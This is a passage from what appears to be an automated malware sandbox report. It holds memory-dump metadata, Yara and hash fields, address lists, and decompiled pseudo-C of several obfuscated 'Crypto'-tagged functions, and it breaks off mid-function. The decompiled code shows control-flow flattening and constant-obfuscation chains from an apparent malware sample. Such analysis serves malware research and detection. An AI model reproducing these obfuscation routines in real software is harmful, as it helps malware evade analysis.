                                              0x00231390
                                              0x00231396
                                              0x0023139e
                                              0x002313a6
                                              0x002313ab
                                              0x002313b3
                                              0x002313bb
                                              0x002313c0
                                              0x002313c5
                                              0x002313c6
                                              0x002313ca
                                              0x002313d2
                                              0x002313da
                                              0x002313e2
                                              0x002313e7
                                              0x002313ef
                                              0x002313fc
                                              0x00231400
                                              0x00231405
                                              0x0023140d
                                              0x00231415
                                              0x0023141a
                                              0x00231422
                                              0x0023142a
                                              0x00231432
                                              0x0023143a
                                              0x00231442
                                              0x0023144a
                                              0x00231457
                                              0x0023145b
                                              0x00231463
                                              0x00231471
                                              0x00231475
                                              0x0023147d
                                              0x00231485
                                              0x0023148a
                                              0x00231492
                                              0x0023149a
                                              0x002314a2
                                              0x002314aa
                                              0x002314b2
                                              0x002314c3
                                              0x002314d0
                                              0x002314d9
                                              0x002314e1
                                              0x002314e9
                                              0x002314f9
                                              0x002314fd
                                              0x00231505
                                              0x00231509
                                              0x0023150e
                                              0x00231514
                                              0x0023151c
                                              0x00231524
                                              0x0023152d
                                              0x00231532
                                              0x00231538
                                              0x00231540
                                              0x00231548
                                              0x00231550
                                              0x0023155d
                                              0x0023155e
                                              0x00231562
                                              0x0023156a
                                              0x00231572
                                              0x00231580
                                              0x00231584
                                              0x0023158c
                                              0x00231594
                                              0x0023159c
                                              0x002315a0
                                              0x002315a5
                                              0x002315ad
                                              0x002315b5
                                              0x002315bd
                                              0x002315c5
                                              0x002315cd
                                              0x002315d5
                                              0x002315dd
                                              0x002315e5
                                              0x002315ed
                                              0x002315f5
                                              0x002315fd
                                              0x002315fd
                                              0x00231607
                                              0x00231713
                                              0x00231718
                                              0x00000000
                                              0x00231718
                                              0x00231613
                                              0x00231747
                                              0x00231750
                                              0x00231752
                                              0x00000000
                                              0x00231767
                                              0x0023161f
                                              0x002316b9
                                              0x002316bf
                                              0x002316e0
                                              0x002316f0
                                              0x002316f4
                                              0x002316fc
                                              0x002316fd
                                              0x00231702
                                              0x00231705
                                              0x00000000
                                              0x00231705
                                              0x0023162b
                                              0x0023169b
                                              0x002316a2
                                              0x002316a9
                                              0x00000000
                                              0x002316a9
                                              0x0023162d
                                              0x0023162f
                                              0x00000000
                                              0x00000000
                                              0x00231635
                                              0x00231642
                                              0x00231647
                                              0x00231659
                                              0x00231666
                                              0x00231670
                                              0x00231676
                                              0x00231689
                                              0x0023168e
                                              0x00231691
                                              0x00231691
                                              0x00231723
                                              0x00231728
                                              0x0023172a
                                              0x0023172a
                                              0x0023172a
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: m $+$IP$j_$k$ld8$n2$B
                                              • API String ID: 0-4100556268
                                              • Opcode ID: 53c0d70455acc8be9ded0f7be305dcf12ad6240fd9ab69a77147eb75b764b5f4
                                              • Instruction ID: 04a2df8bd3fef671147067066c4ac440300fdc7d05839039c8312043e0e3f354
                                              • Opcode Fuzzy Hash: 53c0d70455acc8be9ded0f7be305dcf12ad6240fd9ab69a77147eb75b764b5f4
                                              • Instruction Fuzzy Hash: 3BB150B1018380DFD368CF61C98991BBBF1BBC4758F508A1EF196962A0C7B58A19CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022B75F, Relevance: 10.2, Strings: 8, Instructions: 223COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E0022B75F() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				void* _t241;
				void* _t265;
				signed int* _t269;

				_t269 =  &_v88;
				_v64 = 0xcca9;
				_v64 = _v64 | 0x3d0c477d;
				_v64 = _v64 + 0x3ec7;
				_v64 = _v64 ^ 0xbd0d0ec5;
				_v60 = 0x38c3;
				_v60 = _v60 << 4;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x00000e32;
				_v88 = 0xa439;
				_v88 = _v88 + 0x34d8;
				_v88 = _v88 << 0xe;
				_v4 = 0;
				_v88 = _v88 * 0x46;
				_t265 = 0x32863a22;
				_v88 = _v88 ^ 0xd6a9fef0;
				_v32 = 0x5041;
				_v32 = _v32 ^ 0x94936571;
				_v32 = _v32 ^ 0x94934631;
				_v52 = 0x47aa;
				_t228 = 0x6b;
				_v52 = _v52 * 0x59;
				_v52 = _v52 / _t228;
				_v52 = _v52 ^ 0x00001934;
				_v76 = 0x9d13;
				_v76 = _v76 | 0xffbf7fdf;
				_t229 = 0x4b;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0xf1ffac33;
				_v56 = 0x2528;
				_v56 = _v56 ^ 0xff11bbbe;
				_v56 = _v56 / _t229;
				_v56 = _v56 ^ 0x0366a499;
				_v80 = 0x942e;
				_t230 = 0x65;
				_v80 = _v80 / _t230;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x4cc19e00;
				_v80 = _v80 ^ 0x4db6b316;
				_v28 = 0xb3;
				_t231 = 0x4f;
				_v28 = _v28 / _t231;
				_v28 = _v28 ^ 0x00007dc1;
				_v84 = 0xb6fa;
				_t232 = 0x7e;
				_v84 = _v84 * 0x7b;
				_v84 = _v84 + 0x74c4;
				_v84 = _v84 + 0xffff1df9;
				_v84 = _v84 ^ 0x005758b1;
				_v48 = 0xb943;
				_v48 = _v48 / _t232;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x005e2ced;
				_v24 = 0x593;
				_t233 = 0x59;
				_t225 = _v4;
				_v24 = _v24 * 0x2c;
				_v24 = _v24 ^ 0x0000804c;
				_v72 = 0xf7ad;
				_v72 = _v72 / _t233;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xb94c;
				_v72 = _v72 ^ 0x0003edcb;
				_v20 = 0xede5;
				_t234 = 0x17;
				_v20 = _v20 / _t234;
				_v20 = _v20 ^ 0x00002281;
				_v40 = 0x2895;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x144a8d7d;
				_v44 = 0x7178;
				_v44 = _v44 >> 0xa;
				_t235 = 0xf;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x00005c52;
				_v68 = 0xc8ae;
				_v68 = _v68 | 0xfda66fe8;
				_v68 = _v68 << 0xa;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x04dddb27;
				_v12 = 0xea07;
				_v12 = _v12 + 0xffffa6b0;
				_v12 = _v12 ^ 0x0000adca;
				_v16 = 0x7743;
				_v16 = _v16 | 0x2d86c018;
				_v16 = _v16 ^ 0x2d86a9dd;
				_v36 = 0x116e;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x542dd378;
				_v36 = _v36 ^ 0x542dcb57;
				while(1) {
					L1:
					_t236 = 0x5c;
					_t216 = 0x1a27fc18;
					do {
						while(_t265 != 0x14fc2c0b) {
							if(_t265 == _t216) {
								_t217 = E0022E22B(_v20, _v40, _v8, _t225, _v44);
								_t269 =  &(_t269[3]);
								__eflags = _t217;
								_t265 = 0x35b0a114;
								_v4 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t265 == 0x2364314f) {
									_push(_v32);
									_t218 = E0023889D(0x23c9d0, _v88, __eflags);
									_pop(_t241);
									__eflags = E00233EB3(_v52, _t241, _t218, _v76, _v56, 0x23c9d0, _v80, _v28, 0x23c9d0, _v84, 0x23c9d0, _v60, _v64,  &_v8);
									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
									E00232025(_v48, _t218, _v24, _v72);
									_t269 =  &(_t269[0xf]);
									_t236 = 0x5c;
									L16:
									_t216 = 0x1a27fc18;
									goto L17;
								} else {
									if(_t265 == 0x32863a22) {
										_t265 = 0x14fc2c0b;
										continue;
									} else {
										if(_t265 != 0x35b0a114) {
											goto L17;
										} else {
											E002265A2(_v8, _v68, _v12, _v16, _v36);
										}
									}
								}
							}
							L8:
							return _v4;
						}
						_t226 =  *0x23ca2c; // 0x4d8300
						_t227 = _t226 + 0x230;
						while(1) {
							__eflags =  *_t227 - _t236;
							if( *_t227 == _t236) {
								break;
							}
							_t227 = _t227 + 2;
							__eflags = _t227;
						}
						_t225 = _t227 + 2;
						__eflags = _t227 + 2;
						_t265 = 0x2364314f;
						goto L16;
						L17:
						__eflags = _t265 - 0x34b93fb8;
					} while (__eflags != 0);
					goto L8;
				}
			}










































                                              0x0022b75f
                                              0x0022b762
                                              0x0022b76c
                                              0x0022b776
                                              0x0022b77e
                                              0x0022b786
                                              0x0022b78e
                                              0x0022b793
                                              0x0022b798
                                              0x0022b7a0
                                              0x0022b7a7
                                              0x0022b7ae
                                              0x0022b7b2
                                              0x0022b7be
                                              0x0022b7c2
                                              0x0022b7c7
                                              0x0022b7cf
                                              0x0022b7d7
                                              0x0022b7df
                                              0x0022b7e7
                                              0x0022b7f6
                                              0x0022b7f9
                                              0x0022b805
                                              0x0022b809
                                              0x0022b811
                                              0x0022b819
                                              0x0022b826
                                              0x0022b829
                                              0x0022b82d
                                              0x0022b835
                                              0x0022b83d
                                              0x0022b84d
                                              0x0022b851
                                              0x0022b859
                                              0x0022b865
                                              0x0022b86a
                                              0x0022b870
                                              0x0022b875
                                              0x0022b87d
                                              0x0022b885
                                              0x0022b891
                                              0x0022b896
                                              0x0022b89c
                                              0x0022b8a4
                                              0x0022b8b1
                                              0x0022b8b2
                                              0x0022b8b6
                                              0x0022b8be
                                              0x0022b8c6
                                              0x0022b8ce
                                              0x0022b8dc
                                              0x0022b8e0
                                              0x0022b8e5
                                              0x0022b8ed
                                              0x0022b903
                                              0x0022b906
                                              0x0022b90a
                                              0x0022b90e
                                              0x0022b916
                                              0x0022b926
                                              0x0022b92a
                                              0x0022b92f
                                              0x0022b937
                                              0x0022b93f
                                              0x0022b94b
                                              0x0022b950
                                              0x0022b956
                                              0x0022b95e
                                              0x0022b966
                                              0x0022b96b
                                              0x0022b970
                                              0x0022b978
                                              0x0022b980
                                              0x0022b989
                                              0x0022b98c
                                              0x0022b990
                                              0x0022b998
                                              0x0022b9a0
                                              0x0022b9a8
                                              0x0022b9ad
                                              0x0022b9b2
                                              0x0022b9ba
                                              0x0022b9c2
                                              0x0022b9ca
                                              0x0022b9d2
                                              0x0022b9da
                                              0x0022b9e2
                                              0x0022b9ea
                                              0x0022b9f2
                                              0x0022b9f7
                                              0x0022b9ff
                                              0x0022ba07
                                              0x0022ba07
                                              0x0022ba09
                                              0x0022ba0a
                                              0x0022ba0f
                                              0x0022ba0f
                                              0x0022ba19
                                              0x0022bae9
                                              0x0022baf0
                                              0x0022baf3
                                              0x0022baf5
                                              0x0022bafd
                                              0x00000000
                                              0x0022ba1f
                                              0x0022ba25
                                              0x0022ba67
                                              0x0022ba74
                                              0x0022ba79
                                              0x0022baaf
                                              0x0022bac8
                                              0x0022bacb
                                              0x0022bad0
                                              0x0022bad5
                                              0x0022bb24
                                              0x0022bb24
                                              0x00000000
                                              0x0022ba27
                                              0x0022ba2d
                                              0x0022ba63
                                              0x00000000
                                              0x0022ba2f
                                              0x0022ba35
                                              0x00000000
                                              0x0022ba3b
                                              0x0022ba4f
                                              0x0022ba54
                                              0x0022ba35
                                              0x0022ba2d
                                              0x0022ba25
                                              0x0022ba57
                                              0x0022ba62
                                              0x0022ba62
                                              0x0022bb06
                                              0x0022bb0c
                                              0x0022bb17
                                              0x0022bb17
                                              0x0022bb1a
                                              0x00000000
                                              0x00000000
                                              0x0022bb14
                                              0x0022bb14
                                              0x0022bb14
                                              0x0022bb1c
                                              0x0022bb1c
                                              0x0022bb1f
                                              0x00000000
                                              0x0022bb29
                                              0x0022bb29
                                              0x0022bb29
                                              0x00000000
                                              0x0022bb35

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
                                              • API String ID: 0-1090126677
                                              • Opcode ID: 41364a0639a97165b38db456de852c8799469e5404c428a6e9f50f06c622ac44
                                              • Instruction ID: 4f8f01bc79bfcaa9ba32941615f01b569c78b2f2e9784ce87fc35b38b1582d0d
                                              • Opcode Fuzzy Hash: 41364a0639a97165b38db456de852c8799469e5404c428a6e9f50f06c622ac44
                                              • Instruction Fuzzy Hash: E4A143B1509340ABE359CF64D98A91BBBF2FBC4B48F10491DF185862A0D7B9CA59CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022EA4C, Relevance: 10.2, Strings: 8, Instructions: 203COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E0022EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* __ecx;
				void* _t188;
				void* _t219;
				intOrPtr* _t220;
				void* _t222;
				void* _t241;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int* _t252;

				_t220 = _a12;
				_push(_a16);
				_t241 = __edx;
				_push(_t220);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0022602B(_t188);
				_v8 = 0x50f8de;
				_t242 = 0;
				_v4 = _v4 & 0;
				_t252 =  &(( &_v80)[6]);
				_v76 = 0x4711;
				_v76 = _v76 + 0x6e0d;
				_t222 = 0x302d2de5;
				_v76 = _v76 << 0x10;
				_v76 = _v76 | 0x353296c6;
				_v76 = _v76 ^ 0xb53e96c7;
				_v52 = 0x1390;
				_v52 = _v52 << 4;
				_v52 = _v52 | 0x6ec3950a;
				_t243 = 0x1f;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x024a5273;
				_v64 = 0xc0d5;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x4ce1daf8;
				_v64 = _v64 + 0xffff0c87;
				_v64 = _v64 ^ 0x4ce0d906;
				_v24 = 0xb115;
				_v24 = _v24 / _t243;
				_v24 = _v24 ^ 0x000025ae;
				_v68 = 0xbf02;
				_v68 = _v68 >> 1;
				_v68 = _v68 >> 7;
				_v68 = _v68 | 0xaaaffe07;
				_v68 = _v68 ^ 0xaaaf82c8;
				_v72 = 0x967c;
				_v72 = _v72 ^ 0xbb45b93e;
				_t244 = 0x5e;
				_v72 = _v72 * 0x31;
				_v72 = _v72 | 0x543854ee;
				_v72 = _v72 ^ 0xdc3e0629;
				_v28 = 0xb197;
				_v28 = _v28 / _t244;
				_v28 = _v28 ^ 0x00005929;
				_v80 = 0xf6df;
				_v80 = _v80 * 0x2c;
				_v80 = _v80 + 0xffff5b03;
				_v80 = _v80 ^ 0xcc4f4477;
				_v80 = _v80 ^ 0xcc66b212;
				_v60 = 0x7f94;
				_v60 = _v60 * 0x70;
				_v60 = _v60 + 0xffff5d6f;
				_v60 = _v60 + 0xffffe912;
				_v60 = _v60 ^ 0x0037713c;
				_v40 = 0x7639;
				_v40 = _v40 ^ 0xf24db204;
				_v40 = _v40 * 0xf;
				_v40 = _v40 ^ 0x328e289a;
				_v20 = 0xd74f;
				_v20 = _v20 | 0xd22ad029;
				_v20 = _v20 ^ 0xd22a9d24;
				_v16 = 0xecd5;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x0076152b;
				_v44 = 0x5bc3;
				_v44 = _v44 + 0x5ef7;
				_v44 = _v44 | 0x81401b0a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x00015921;
				_v32 = 0x3f29;
				_t245 = 0x22;
				_v32 = _v32 / _t245;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x00005264;
				_v48 = 0x731;
				_v48 = _v48 | 0x306aed8f;
				_v48 = _v48 + 0xffff48d8;
				_t246 = 0x76;
				_v48 = _v48 / _t246;
				_v48 = _v48 ^ 0x0069195c;
				_v36 = 0x33bb;
				_t247 = 0x45;
				_v36 = _v36 / _t247;
				_v36 = _v36 + 0xffffe7cb;
				_v36 = _v36 ^ 0xfffff379;
				_v56 = 0xdfcb;
				_t248 = 0x48;
				_v56 = _v56 / _t248;
				_t249 = 0x3a;
				_v56 = _v56 / _t249;
				_v56 = _v56 * 0x52;
				_v56 = _v56 ^ 0x00005386;
				do {
					while(_t222 != 0x246653ae) {
						if(_t222 == 0x260f4fd2) {
							_push(_t222);
							_push(_t222);
							_t242 = E00228736(_v12);
							if(_t242 != 0) {
								_t222 = 0x246653ae;
								continue;
							}
						} else {
							if(_t222 == 0x2ff0f75c) {
								_t219 = E002359A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
								_t252 =  &(_t252[0xb]);
								if(_t219 != 0) {
									_t222 = 0x260f4fd2;
									continue;
								}
							} else {
								if(_t222 != 0x302d2de5) {
									goto L11;
								} else {
									_t222 = 0x2ff0f75c;
									continue;
								}
							}
						}
						goto L12;
					}
					E002359A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
					_t252 =  &(_t252[0xb]);
					 *_t220 = _v12;
					_t222 = 0x6a13bb9;
					L11:
				} while (_t222 != 0x6a13bb9);
				L12:
				return _t242;
			}






































                                              0x0022ea50
                                              0x0022ea57
                                              0x0022ea5b
                                              0x0022ea5d
                                              0x0022ea5e
                                              0x0022ea62
                                              0x0022ea66
                                              0x0022ea68
                                              0x0022ea6d
                                              0x0022ea75
                                              0x0022ea77
                                              0x0022ea7b
                                              0x0022ea7e
                                              0x0022ea88
                                              0x0022ea90
                                              0x0022ea95
                                              0x0022ea9a
                                              0x0022eaa2
                                              0x0022eaaa
                                              0x0022eab2
                                              0x0022eab7
                                              0x0022eac6
                                              0x0022eac9
                                              0x0022eacd
                                              0x0022ead5
                                              0x0022eadd
                                              0x0022eae2
                                              0x0022eaea
                                              0x0022eaf2
                                              0x0022eafa
                                              0x0022eb0a
                                              0x0022eb0e
                                              0x0022eb16
                                              0x0022eb1e
                                              0x0022eb22
                                              0x0022eb27
                                              0x0022eb2f
                                              0x0022eb37
                                              0x0022eb3f
                                              0x0022eb4c
                                              0x0022eb4d
                                              0x0022eb51
                                              0x0022eb59
                                              0x0022eb61
                                              0x0022eb6f
                                              0x0022eb73
                                              0x0022eb7b
                                              0x0022eb88
                                              0x0022eb8c
                                              0x0022eb94
                                              0x0022eb9c
                                              0x0022eba4
                                              0x0022ebb1
                                              0x0022ebb5
                                              0x0022ebbd
                                              0x0022ebc5
                                              0x0022ebcd
                                              0x0022ebd5
                                              0x0022ebe2
                                              0x0022ebe6
                                              0x0022ebee
                                              0x0022ebf6
                                              0x0022ebfe
                                              0x0022ec06
                                              0x0022ec10
                                              0x0022ec15
                                              0x0022ec1d
                                              0x0022ec25
                                              0x0022ec2d
                                              0x0022ec35
                                              0x0022ec3a
                                              0x0022ec42
                                              0x0022ec50
                                              0x0022ec55
                                              0x0022ec5b
                                              0x0022ec60
                                              0x0022ec68
                                              0x0022ec70
                                              0x0022ec78
                                              0x0022ec84
                                              0x0022ec89
                                              0x0022ec8f
                                              0x0022ec97
                                              0x0022eca3
                                              0x0022eca8
                                              0x0022ecae
                                              0x0022ecb6
                                              0x0022ecbe
                                              0x0022ecca
                                              0x0022eccf
                                              0x0022ecd9
                                              0x0022ece1
                                              0x0022ecea
                                              0x0022ecee
                                              0x0022ecf6
                                              0x0022ecf6
                                              0x0022ed04
                                              0x0022ed65
                                              0x0022ed66
                                              0x0022ed70
                                              0x0022ed76
                                              0x0022ed78
                                              0x00000000
                                              0x0022ed78
                                              0x0022ed06
                                              0x0022ed0c
                                              0x0022ed46
                                              0x0022ed4b
                                              0x0022ed50
                                              0x0022ed52
                                              0x00000000
                                              0x0022ed52
                                              0x0022ed0e
                                              0x0022ed14
                                              0x00000000
                                              0x0022ed1a
                                              0x0022ed1a
                                              0x00000000
                                              0x0022ed1a
                                              0x0022ed14
                                              0x0022ed0c
                                              0x00000000
                                              0x0022ed04
                                              0x0022eda3
                                              0x0022edaf
                                              0x0022edb2
                                              0x0022edb4
                                              0x0022edb9
                                              0x0022edb9
                                              0x0022edc6
                                              0x0022edce

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: n$)?$9v$<q7$dR$--0$--0$T8T
                                              • API String ID: 0-1820671589
                                              • Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                              • Instruction ID: 4e0e67054b937493f20d7c8ea760b1c6b4041d4ca9dacbc5126a2b4b7dae3ab1
                                              • Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                              • Instruction Fuzzy Hash: 6C915271009341ABD728CF62C98981FFBF1FBC5B58F404A1DF2968A260C7B68A158F47
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0023A0AF, Relevance: 9.0, Strings: 7, Instructions: 283COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E0023A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t237;
				void* _t251;
				void* _t256;
				short _t257;
				void* _t258;
				void* _t262;
				signed int _t268;
				signed int _t269;
				void* _t271;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				intOrPtr _t319;
				signed int _t320;
				signed int _t323;
				signed int* _t325;
				void* _t327;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t237);
				_v8 = _v8 & 0x00000000;
				_t325 =  &(( &_v108)[4]);
				_v36 = 0x3ea4;
				_v36 = _v36 >> 7;
				_t271 = 0x1d995f52;
				_v36 = _v36 ^ 0x0000fd94;
				_v100 = 0xb5d8;
				_t313 = 0x12;
				_v100 = _v100 / _t313;
				_v100 = _v100 + 0xffffd667;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xffc12715;
				_v44 = 0xa7b5;
				_v44 = _v44 + 0x5ef4;
				_v44 = _v44 ^ 0x00014b95;
				_v48 = 0x9389;
				_v48 = _v48 + 0xb0ba;
				_v48 = _v48 ^ 0x000118ce;
				_v88 = 0x5fea;
				_t314 = 0x1c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x636ec63e;
				_v88 = _v88 ^ 0x63409d32;
				_v16 = 0x76ea;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x000ec3ec;
				_v20 = 0x91aa;
				_v20 = _v20 | 0x0edf39e6;
				_v20 = _v20 ^ 0x0edfdf8b;
				_v52 = 0xaa70;
				_v52 = _v52 + 0x8ed4;
				_v52 = _v52 ^ 0x00017b8d;
				_v104 = 0xa114;
				_v104 = _v104 >> 5;
				_v104 = _v104 << 0xc;
				_v104 = _v104 / _t314;
				_v104 = _v104 ^ 0x0002b555;
				_v108 = 0xd093;
				_v108 = _v108 << 0xa;
				_t315 = 0x69;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 / _t315;
				_v108 = _v108 ^ 0x024bf4a9;
				_v80 = 0x5298;
				_v80 = _v80 | 0xf2bddfef;
				_v80 = _v80 ^ 0xf2bdee35;
				_v84 = 0xad61;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x5376a172;
				_v84 = _v84 ^ 0x535d9bb3;
				_v96 = 0xfad4;
				_v96 = _v96 + 0xc0fb;
				_t316 = 0x75;
				_v96 = _v96 / _t316;
				_t317 = 0x41;
				_t323 = _a8;
				_v96 = _v96 / _t317;
				_v96 = _v96 ^ 0x00007e63;
				_v40 = 0x6cc;
				_v40 = _v40 + 0x5321;
				_v40 = _v40 ^ 0x00002fe7;
				_v76 = 0xe38c;
				_v76 = _v76 + 0x66b4;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x00001a53;
				_v68 = 0xaffd;
				_v68 = _v68 + 0x9b0e;
				_v68 = _v68 ^ 0x74692a2f;
				_v68 = _v68 ^ 0x74685d67;
				_v92 = 0xd493;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffb819;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0xfffdea97;
				_v32 = 0x61b7;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00001b97;
				_v72 = 0x8555;
				_v72 = _v72 >> 6;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x00005e98;
				_v64 = 0xfd5d;
				_v64 = _v64 ^ 0xfb760f92;
				_v64 = _v64 + 0xe44c;
				_v64 = _v64 ^ 0xfb77c0e2;
				_v24 = 0xfd78;
				_v24 = _v24 ^ 0x534e19f9;
				_v24 = _v24 ^ 0x534eb204;
				_v28 = 0xae38;
				_v28 = _v28 ^ 0x0fcca386;
				_v28 = _v28 ^ 0x0fcc33c1;
				_t268 = _a8;
				_v56 = 0x9a6f;
				_v56 = _v56 | 0xcfdc8d68;
				_v56 = _v56 ^ 0xf237fb5d;
				_v56 = _v56 ^ 0x3deb56e2;
				_v12 = 0xde50;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x0de56132;
				_v60 = 0x8399;
				_v60 = _v60 ^ 0x95508e48;
				_v60 = _v60 ^ 0xc724022f;
				_v60 = _v60 ^ 0x52742192;
				while(1) {
					L1:
					_t251 = 0x10ef006b;
					do {
						while(1) {
							L2:
							_t327 = _t271 - 0x1d995f52;
							if(_t327 > 0) {
								break;
							}
							if(_t327 == 0) {
								_t271 = 0x1679d154;
								continue;
							} else {
								if(_t271 == 0x829cfc0) {
									_t311 = _v8;
									if(_t311 != 0) {
										do {
											_t320 =  *((intOrPtr*)(_t311 + 0x220));
											E0022F536(_v56, _v12, _v60, _t311);
											_t311 = _t320;
										} while (_t320 != 0);
									}
								} else {
									if(_t271 == _t251) {
										_t312 = _v8;
										_t268 = 0;
										if(_t312 != 0) {
											do {
												E00226636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
												_t256 = E00230ADC(_t312 + 0xc, _v40, _v76);
												_t325 =  &(_t325[4]);
												_t269 = _t268 + _t256;
												_t257 = 0x2c;
												 *((short*)(_t323 + _t269 * 2)) = _t257;
												_t268 = _t269 + 1;
												_t312 =  *((intOrPtr*)(_t312 + 0x220));
											} while (_t312 != 0);
											_t251 = 0x10ef006b;
										}
										_t319 = _v4;
										_t271 = 0x33a3af6e;
										_t310 = _a8;
										continue;
									} else {
										if(_t271 == 0x1679d154) {
											E00235A61( &_v8, E00238D1C, _v44, _v48, _v88);
											_t325 =  &(_t325[4]);
											_t271 = 0x20b4c829;
											while(1) {
												L1:
												_t251 = 0x10ef006b;
												goto L2;
											}
										} else {
											if(_t271 != 0x19514a0a) {
												goto L24;
											} else {
												_push(_t271);
												_push(_t271);
												_t323 = E00228736(_t319 + _t319);
												_t251 = 0x10ef006b;
												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
												continue;
											}
										}
									}
								}
							}
							L28:
							return 0 |  *_a8 != 0x00000000;
						}
						if(_t271 == 0x20b4c829) {
							_t309 = _v8;
							_t319 = 0;
							_v4 = 0;
							if(_t309 != 0) {
								do {
									_t258 = E00230ADC(_t309 + 0xc, _v16, _v20);
									_t309 =  *(_t309 + 0x220);
									_t319 = _t319 + 1 + _t258;
								} while (_t309 != 0);
								_v4 = _t319;
								_t251 = 0x10ef006b;
							}
							_t310 = _a8;
							_t271 = 0x19514a0a;
							goto L24;
						} else {
							if(_t271 == 0x2b3a1c97) {
								E0022F536(_v64, _v24, _v28, _t323);
								_t271 = 0x829cfc0;
								goto L1;
							} else {
								if(_t271 != 0x33a3af6e) {
